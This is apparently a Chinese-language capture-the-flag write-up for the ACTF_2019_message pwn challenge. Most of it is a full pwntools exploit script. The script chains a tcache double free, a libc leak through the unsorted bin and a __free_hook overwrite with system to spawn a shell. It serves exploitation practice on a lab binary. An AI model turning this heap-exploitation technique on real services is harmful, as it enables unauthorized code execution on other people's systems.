ACTF_2019_message

有uaf漏洞，但是打印的话会检查size，所以不能简单地uaf

add(0x200,'aaaa')
add(0x200,'aaaa')
free(0)
free(0)
add(0x200,p64(0x60204c))
add(0x200,'aaaa')

成功控制堆指针

payload=p64(1)+p64(0)+b'\x00'*4+p64(0x200)+p64(0x60204c)+p64(0)*20

add(0x200,payload)

for i in range(8):
    add(0x80,'aaaa')

#8
for i in range(1,7):
    free(i)
free(8) 

add的大小是0x80，保证了满的时侯的那个bin放在unsorted bin，最后两个倒序释放，防止和top chunk合并

free(7)

堆7指针是main_arena+96

我试了这种方法也可以show出来，不过edit的时候不能sendline，不然会覆盖掉一个字节，导致show的地址出错

payload=p64(1)+p64(0)+b'\x00'*4+p64(0x200)+p64(0x60204c)+p64(0)*12+p64(0x80)
edit(0,payload)

show(7)

这里因为用sendline所以出错了

或者用师傅的做法，不过我的更简单

edit(0,payload)

for i in range(7):
    add(0x80,'aaaa')
add(0x8,'aaaaaaa') #堆8，会在unsorted bin里拿
show(8)

r.recvuntil('The message: aaaaaaa')
main_arena=u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-224 #这里减0x80再减96
#libc2.23和2.27都是__malloc_hook=main_arena-0x10
print('main_'+hex(main_arena))
base=main_arena-0x10-libc.sym['__malloc_hook']

payload=p64(1)+p64(0)+b'\x00'*4+p64(0x200)+p64(0x60204c)+p64(0x80)+p64(binsh)+p64(0x80)+p64(free_hook)

edit(0,payload)

edit(2,p64(system))

最后有个地方就是free(1)会报错，得分开或者手动

exp

from pwn import*
from LibcSearcher import *
#r=remote("node5.buuoj.cn",29647)
r=process("./ACTF_2019_message")
context.log_level="debug"
context(log_level='debug',arch='amd64',os='linux')
libc=ELF('./libc-2.27.so')
elf=ELF('./ACTF_2019_message')

def choice(nu):
    r.sendlineafter('choice: ', str(nu))

def add(size,content):
    choice(1)
    r.sendlineafter('length of message:\n', str(size))
    r.sendlineafter('input the message:\n', content)

def free(idx):
    choice(2)
    r.sendlineafter('you want to delete:\n', str(idx))

def edit(idx, content):
    choice(3)
    r.sendlineafter('you want to edit:\n', str(idx))
    r.sendlineafter('edit the message:\n', content )

def show(idx):
    choice(4)
    r.sendlineafter('want to display:\n', str(idx))

add(0x200,'aaaa') #0
add(0x200,'aaaa') #1
free(0)
free(0)
add(0x200,p64(0x60204c))
add(0x200,'aaaa')

payload=p64(1)+p64(0)+b'\x00'*4+p64(0x200)+p64(0x60204c)+p64(0)*20



add(0x200,payload) #0


for i in range(8):
    add(0x80,'aaaa')

#8
for i in range(1,7):
    free(i)
free(8) 
free(7)

edit(0,payload)

for i in range(7):
    add(0x80,'aaaa')


add(0x10,'aaaaaaa')

show(8)
r.recvuntil('The message: aaaaaaa')
main_arena=u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-224

print('main_'+hex(main_arena))
base=main_arena-0x10-libc.sym['__malloc_hook']
free_hook=base+libc.sym['__free_hook']
system=base+libc.sym['system']
binsh=base+ next(libc.search(b'/bin/sh'))
print(hex(system))
payload=p64(1)+p64(0)+b'\x00'*4+p64(0x200)+p64(0x60204c)+p64(0x80)+p64(binsh)+p64(0x80)+p64(free_hook)

edit(0,payload)

edit(2,p64(system))
#gdb.attach(r)
#sleep(1)
r.sendlineafter('choice: ','2')
r.sendlineafter('you want to delete:\n','1')
# 有时候得手动free(1),不然打不通，很离谱
#free(1)

r.interactive()